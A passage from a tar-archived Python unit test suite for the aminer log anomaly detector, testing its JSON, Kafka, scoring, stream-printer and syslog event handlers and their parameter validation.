        rejects(d.CONFIG_KEY_ALERT_MAX_GAP, non_numeric, TypeError)
        rejects(d.CONFIG_KEY_ALERT_MAX_GAP, (-1,), ValueError)
        accepts(d.CONFIG_KEY_ALERT_MAX_GAP, (600, 600.3))

        # the minimum gap must not exceed the maximum gap
        acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 0
        acp[d.CONFIG_KEY_ALERT_MAX_GAP] = 0
        d(ac)
        rejects(d.CONFIG_KEY_ALERT_MIN_GAP, (1,), ValueError)
        acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 0

        # events per message: a number, but at least one
        rejects(d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, non_numeric, TypeError)
        rejects(d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, (0,), ValueError)
        accepts(d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, (123, 123.3))

        # Test if mail addresses are validated as expected.
        acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "root@localhost"
        acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = "root@localhost"
        d(ac)
        for target, sender in (("domain.user1@localhost", "root@localhost"), ("domain.user1@localhost", "domain.user1@localhost"),
                               ("root@notLocalhost", "root@localhost"), ("root@localhost", "root@notLocalhost")):
            acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = target
            acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = sender
            self.assertRaises(ValueError, d, ac)


if __name__ == "__main__":
    unittest.main()
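import time
import unittest
from aminer.events.JsonConverterHandler import JsonConverterHandler
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext


class JsonConverterHandlerTest(TestBase):
    """Unittests for the JsonConverterHandler."""

    maxDiff = None
    output_logline = True
    resource_name = b"testresource"
    persistence_id = "Default"

    def _captured_output(self, drop_extra_newline):
        """Return what the handler wrote to the output stream and the DetectionTimestamp contained in it.

        @param drop_extra_newline when True, one trailing newline is removed if the output ends with a blank line.
        @return tuple (output_text, detection_timestamp); the timestamp is the text after the first colon on the
        first "DetectionTimestamp" line with blanks and commas stripped, or None when no such line exists.
        """
        text = self.output_stream.getvalue()
        if drop_extra_newline and text.endswith("\n\n"):
            text = text[:-1]
        detection_timestamp = None
        for line in text.split("\n"):
            if "DetectionTimestamp" in line:
                detection_timestamp = line.split(":")[1].strip(" ,")
                break
        return text, detection_timestamp

    def test1receive_event(self):
        """Test if events are processed correctly and that edge cases are caught in exceptions."""
        match_context = DummyMatchContext(b" pid=")
        fdme = DummyFixedDataModelElement("s1", b" pid=")
        match_element = fdme.get_match_element("match", match_context)
        t = time.time()
        test = "Analysis.TestDetector"
        event_message = "An event happened!"
        sorted_log_lines = ["Event happened at /path/ 5 times.", "", "", "", ""]
        description = "jsonConverterHandlerDescription"
        expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n "AnalysisComponentType": "%s",\n ' \
            '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "%s",\n "AffectedParserPaths":' \
            ' [\n "test/path/1",\n "test/path/2"\n ],\n "LogResource": "testresource"\n },\n "LogData": ' \
            '{\n "RawLogData": [\n " pid="\n ],\n "Timestamps": [\n %s\n ],\n "DetectionTimestamp":' \
            ' %s,\n "LogLinesCount": 5,\n "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n'
        jch = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context)
        log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self)
        self.analysis_context.register_component(self, description)
        event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}}

        def expected(detection_timestamp):
            # DetectionTimestamp is produced by the handler at send time, so it is read back from the output.
            return expected_string % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")

        jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self)
        val, detection_timestamp = self._captured_output(False)
        self.assertEqual(val, expected(detection_timestamp))
        self.reset_output_stream()

        # test output_event_handlers
        self.output_event_handlers = []
        self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self))
        self.assertEqual(self.output_stream.getvalue(), "")
        self.output_event_handlers = [jch]
        self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self))
        val, detection_timestamp = self._captured_output(True)
        self.assertEqual(val, expected(detection_timestamp))
        self.reset_output_stream()

        # test suppress detector list
        self.output_event_handlers = None
        self.analysis_context.suppress_detector_list = [description]
        self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self))
        self.assertEqual(self.output_stream.getvalue(), "")
        self.output_event_handlers = [jch]
        self.analysis_context.suppress_detector_list = []
        self.assertTrue(jch.receive_event(test, event_message, sorted_log_lines, event_data, log_atom, self))
        # Check the output of this last call. Comparing the value captured before the stream reset would
        # only repeat the earlier assertion and never verify that output resumes once the suppress list is cleared.
        val, detection_timestamp = self._captured_output(True)
        self.assertEqual(val, expected(detection_timestamp))

    def test2validate_parameters(self):
        """Test all initialization parameters for the event handler. Input parameters must be validated in the class."""
        JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context)
        # the handler list has to be a list of event handlers
        for handlers in (["default"], None, "Default", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, JsonConverterHandler, handlers, self.analysis_context)
        # an empty handler list is rejected with ValueError
        self.assertRaises(ValueError, JsonConverterHandler, [], self.analysis_context)
        # the third parameter rejects every non-boolean value
        for flag in (["default"], None, "Default", b"Default", 123, 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, JsonConverterHandler, [self.stream_printer_event_handler], self.analysis_context, flag)


if __name__ == '__main__':
    unittest.main()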
group_id=cls.group, value_deserializer=lambda x: x.decode(), api_version=(2, 0, 1), auto_offset_reset="earliest") @classmethod def tearDownClass(cls): """Shutdown the KafkaConsumer.""" cls.consumer.close() def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" self.maxDiff = None match_context = DummyMatchContext(b" pid=") fdme = DummyFixedDataModelElement("s1", b" pid=") match_element = fdme.get_match_element("match", match_context) description = "jsonConverterHandlerDescription" t = time.time() test_detector = "Analysis.TestDetector" event_message = "An event happened!" sorted_log_lines = ["Event happened at /path/ 5 times.", "", "", "", ""] exp = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n "AnalysisComponentType": "%s",\n ' \ '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n' \ ' "test/path/1",\n "test/path/2"\n ],\n "LogResource": "testresource"\n },\n "LogData": {\n ' \ '"RawLogData": [\n " pid="\n ],\n "Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n ' \ '"LogLinesCount": 5,\n "AnnotatedMatchElement": {\n "match/s1": " pid="\n }\n }%s\n}\n' # This unittest tests the receive_event method with serialized data from the JsonConverterHandler. 
jch = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) self.analysis_context.register_component(self, description) event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}} jch.receive_event(test_detector, event_message, sorted_log_lines, event_data, log_atom, self) output = self.output_stream.getvalue() keh = KafkaEventHandler(self.analysis_context, self.topic, { "bootstrap_servers": ["localhost:9092"], "api_version": (2, 0, 1), "max_block_ms": 120000}) self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # This unittest tests the receive_event method with not serialized data. 
log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}} keh = KafkaEventHandler(self.analysis_context, self.topic, { "bootstrap_servers": ["localhost:9092"], "api_version": (2, 0, 1), "max_block_ms": 120000}) self.assertFalse(keh.receive_event(test_detector, event_message, sorted_log_lines, event_data, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) self.output_event_handlers = [keh] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(StopIteration, self.consumer.__next__) self.output_event_handlers = [keh] self.analysis_context.suppress_detector_list = [] self.assertTrue(keh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) val = self.consumer.__next__().value detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) def 
test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" options = {"bootstrap_servers": ["localhost:9092"], "api_version": (2, 0, 1), "max_block_ms": 120000} KafkaEventHandler(self.analysis_context, self.topic, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, ["default"], options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, None, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, b"Default", options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, True, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, 123, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, 123.3, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, {"id": "Default"}, options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, (), options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, set(), options) self.assertRaises(ValueError, KafkaEventHandler, self.analysis_context, "", options) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, ["default"]) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, b"default") self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, "default") self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, None) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, True) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, 123) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, 123.3) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, ()) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, 
self.topic, set()) self.assertRaises(TypeError, KafkaEventHandler, self.analysis_context, self.topic, {b"bootstrap_servers": ["localhost:9092"]}) KafkaEventHandler(self.analysis_context, self.topic, {}) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/ScoringEventHandlerTest.py000066400000000000000000000355121500476301700304100ustar00rootroot00000000000000import time from aminer.events.ScoringEventHandler import ScoringEventHandler from aminer.analysis.SlidingEventFrequencyDetector import SlidingEventFrequencyDetector from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from datetime import datetime from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class ScoringEventHandlerTest(TestBase): """Unittests for the ScoringEventHandler.""" resource_name = b"testresource" pub_url = "tcp://*:5555" sub_url = "tcp://localhost:5555" topic = "test_topic" description = "jsonConverterHandlerDescription" persistence_id = "Default" test_detector = "Analysis.TestDetector" sorted_log_lines = ["Event happend at /path/ 5 times.", "", "", "", ""] expected_string = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 1,\n "AnalysisComponentType": "%s",\n ' \ '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "Default",\n "TrainingMode": true,\n' \ ' "AffectedLogAtomPaths": [],\n "AffectedLogAtomValues": [\n "/value"\n ],\n ' \ '"LogResource": "SlidingEventFrequencyDetector"\n },\n "FrequencyData": {\n' \ ' "ExpectedLogAtomValuesFrequencyRange": [\n 0,\n 2\n ],\n "LogAtomValuesFrequency": %d,\n ' \ '"WindowSize": 10%s\n },\n "LogData": {\n "RawLogData": [\n "%s"\n ],\n ' \ '"Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 1\n }%s\n}\n' match_context1 = DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") 
match_element1 = fdme1.get_match_element("", match_context1) @classmethod def setUpClass(cls): pass @classmethod def tearDownClass(cls): pass def test1receive_event(self): """Test if events are processed correctly.""" self.maxDiff = None t = round(time.time(), 3) log_atom = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, self) self.analysis_context.register_component(self, self.description) event_data = {'AnalysisComponent': {'AffectedParserPaths': ['test/path/1', 'test/path/2']}} json_converter_handler = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) scoring_event_handler = ScoringEventHandler([json_converter_handler], self.analysis_context) scoring_event_handler.receive_event(self.test_detector, "Frequency exceeds range for the first time", self.sorted_log_lines, event_data, log_atom, self) self.reset_output_stream() t = time.time() sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[scoring_event_handler], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False, scoring_path_list=["/value"]) sefd_name = "SlidingEventFrequencyDetector" self.analysis_context.register_component(sefd, sefd_name) sefd.resource_name = b"SlidingEventFrequencyDetector" # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. 
# The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 3 times # value b: 1 time # window 3: # value a: 0 times # value b: 2 times # window 4: # value a: 1 time # Start of window 1: log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 1, sefd) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 3, sefd) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 7, sefd) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 13, sefd) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 17, sefd) log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 18, sefd) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 19, sefd) # Start of window 3: log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, sefd) log_atom9 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, sefd) # Start of window 4: log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 35, sefd) sefd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 1]) sefd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 1, t + 3]) sefd.receive_atom(log_atom3) detection_timestamp = None for line in self.output_stream.getvalue().split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') break self.assertEqual(self.output_stream.getvalue(), self.expected_string % (sefd_name, sefd_name, "Frequency exceeds range for the first time", 3, "", "a", round(t + 7, 2), detection_timestamp, "")) self.reset_output_stream() 
self.assertEqual(list(sefd.counts[("/value",)]), [t + 1, t + 3, t + 7]) sefd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 3, t + 7, t + 13]) sefd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 7, t + 13, t + 17]) sefd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 13, t + 17, t + 18]) sefd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 13, t + 17, t + 18, t + 19]) sefd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 17, t + 18, t + 19, t + 25]) sefd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(list(sefd.counts[("/value",)]), [t + 17, t + 18, t + 19, t + 25, t + 25]) sefd.receive_atom(log_atom10) for line in self.output_stream.getvalue().split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(':')[1].strip(' ,') break scoring_result = ',\n "Confidence": 0.6,\n "Local_maximum_timestamp": %s,\n "IdValues": [\n "b",\n "a",\n ' \ '"a",\n "b",\n "b"\n ],\n "Scoring": {\n "confidence_absolut": 2.5,\n ' \ '"confidence_mean": 0.5\n }' % str(round(t + 25, 2)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (sefd_name, sefd_name, "Frequency anomaly detected", 5, scoring_result, "b", round(t + 25, 2), detection_timestamp, "")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("/value",)]), [t + 25, t + 25, t + 35]) def test2validate_parameters(self): """Test all initialization parameters for the event handler. 
Input parameters must be validated in the class.""" self.assertRaises(TypeError, ScoringEventHandler, "Default", self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, b"Default", self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, True, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, 123, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, 123.3, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, {"id": "Default"}, self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, ["string"], self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, ["string", self.stream_printer_event_handler], self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, set(), self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, (), self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, None, self.analysis_context) self.assertRaises(ValueError, ScoringEventHandler, [], self.analysis_context) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], "Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], ["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, ScoringEventHandler, 
[self.stream_printer_event_handler], None) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights="Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=True) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=123) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=123.3) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights={"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, weights=[]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights="Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=123) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=123.3) self.assertRaises(TypeError, ScoringEventHandler, 
[self.stream_printer_event_handler], self.analysis_context, auto_weights={"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights=[]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length="Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=b"Default") self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=True) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=123.3) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length={"id": "Default"}) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=["string"]) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=set()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=()) self.assertRaises(TypeError, ScoringEventHandler, [self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=[]) self.assertRaises(ValueError, ScoringEventHandler, 
[self.stream_printer_event_handler], self.analysis_context, auto_weights_history_length=0) ScoringEventHandler([self.stream_printer_event_handler], self.analysis_context, weights = {"value": 0.5}, auto_weights=True, auto_weights_history_length=101) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/StreamPrinterEventHandlerTest.py000066400000000000000000000126271500476301700316050ustar00rootroot00000000000000import unittest import sys import io from time import time from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from datetime import datetime class StreamPrinterEventHandlerTest(TestBase): """Unittests for the StreamPrinterEventHandler.""" def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" # In this test case the EventHandler receives multiple lines from the test class. 
description = "Test1StreamPrinterEventHandler" exp = '%s New value for paths %s: %s\n%s: "%s" (%d lines)\n%s\n' pid = b" pid=" test = "Test.%s" match_s1 = "match/s1" match_s2 = "match/s2" match_context = DummyMatchContext(pid) fdme = DummyFixedDataModelElement("s1", pid) match_element = fdme.get_match_element("match", match_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) new_val = "New value for paths %s, %s: %s" % (match_s1, match_s2, repr(match_element.match_object)) self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) dt = datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S") self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=\n")) self.reset_output_stream() #In this test case the EventHandler receives no lines from the test class. self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [], None, log_atom, self) self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 0, "")) self.reset_output_stream() #In this test case the EventHandler receives no logAtom from the test class and the method should raise an exception. 
self.assertRaises(Exception, self.stream_printer_event_handler.receive_event, test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), "") self.output_event_handlers = [self.stream_printer_event_handler] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=\n")) self.reset_output_stream() # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), "") self.output_event_handlers = [self.stream_printer_event_handler] self.analysis_context.suppress_detector_list = [] self.assertTrue(self.stream_printer_event_handler.receive_event(test % self.__class__.__name__, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) self.assertEqual(self.output_stream.getvalue(), exp % (dt, match_s1 + ", " + match_s2, "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=\n")) def test2validate_parameters(self): """Test all initialization parameters for the event handler. 
Input parameters must be validated in the class.""" self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, "") self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, b"") self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, ["default"]) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, None) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, True) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, 123) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, 123.3) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, {"id": "Default"}) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, ()) self.assertRaises(TypeError, StreamPrinterEventHandler, self.analysis_context, set()) StreamPrinterEventHandler(self.analysis_context, sys.stdout) StreamPrinterEventHandler(self.analysis_context, sys.stderr) StreamPrinterEventHandler(self.analysis_context, self.output_stream) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/SyslogWriterEventHandlerTest.py000066400000000000000000000125211500476301700314540ustar00rootroot00000000000000import unittest import os from datetime import datetime from time import time, sleep from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class SyslogWriterEventHandlerTest(TestBase): """Some of the test cases may fail if the same numbers as the PID are found in the syslog. 
Rerun the unit, when this happens.""" def test1receive_event(self): """In this test case the EventHandler receives multiple lines from the test class.""" description = "Test1SyslogWriterEventHandler" pid = b" pid=" test = "Test.%s" % self.__class__.__name__ match_context = DummyMatchContext(pid) fdme = DummyFixedDataModelElement("s1", pid) match_element = fdme.get_match_element("match", match_context) new_val = "New value for paths match/s1, match/s2: b' pid='" t = time() dtm = datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S") exp1 = '[0] %s %s\n[0-1] %s: "%s" (%d lines)\n[0-2] pid=\n[0-3] pid=\n' % (dtm, new_val, self.__class__.__name__, description, 2) exp2 = '[1] %s %s\n[1-1] %s: "%s" (%d lines)\n' % (dtm, new_val, self.__class__.__name__, description, 0) sweh = SyslogWriterEventHandler(self.analysis_context, "aminer") self.analysis_context.register_component(self, description) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) string = self.extract_syslog_string() found = False string = string.split("Syslog logger initialized\n") for log in string: if exp1 in log: found = True self.assertTrue(found) # In this test case the EventHandler receives no lines from the test class. sweh.receive_event(test, new_val, [], None, log_atom, self) string = self.extract_syslog_string() found = False string = string.split("Syslog logger initialized\n") for log in string: if exp2 in log: found = True self.assertTrue(found) # In this test case the EventHandler receives no logAtom from the test class and the class should raise an exception. 
